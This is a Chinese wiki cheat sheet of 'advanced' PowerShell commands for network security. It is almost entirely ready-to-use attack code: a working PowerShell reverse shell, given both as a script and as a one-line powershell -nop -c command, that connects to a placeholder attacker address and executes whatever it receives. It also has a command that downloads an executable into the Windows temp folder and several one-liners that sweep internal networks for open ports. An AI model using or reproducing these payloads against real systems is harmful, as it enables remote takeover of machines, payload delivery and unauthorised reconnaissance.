侧边栏
网络安全:powershell进阶命令
Powershell反弹命令
$client=New-Object Net.Sockets.TCPClient('x.x.x.x',22);
$stream=$client.GetStream();
[byte[]]$bytes=0..65535|%{0};
while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1 | Out-String);
$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()
命令行一步到位:
powershell -nop -c "$client=New-Object Net.Sockets.TCPClient('x.x.x.x',8888);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String);$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Powershell下载文件
powershell -nop -c "$client=new-object System.Net.WebClient;$client.DownloadFile('http://x.x.x.x/o.exe', 'c:\windows\temp\o.exe')"
powershell扫描内网某台机器的端口
1..9999 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.0.1",$_)) "Port $_ is open!"} 2>$null
powershell扫描内网范围单一端口
foreach ($ip in 1..255) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}
扫描某个ip段的端口范围
1..255 | % { $a = $_; 1..999 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.0.$a",$_)) "Port $_ is open!"} 2>$null}
你需要登录发表评论。
网络安全/powershell进阶命令.txt · 最后更改: 2020/05/16 19:19 (外部编辑)
页面工具
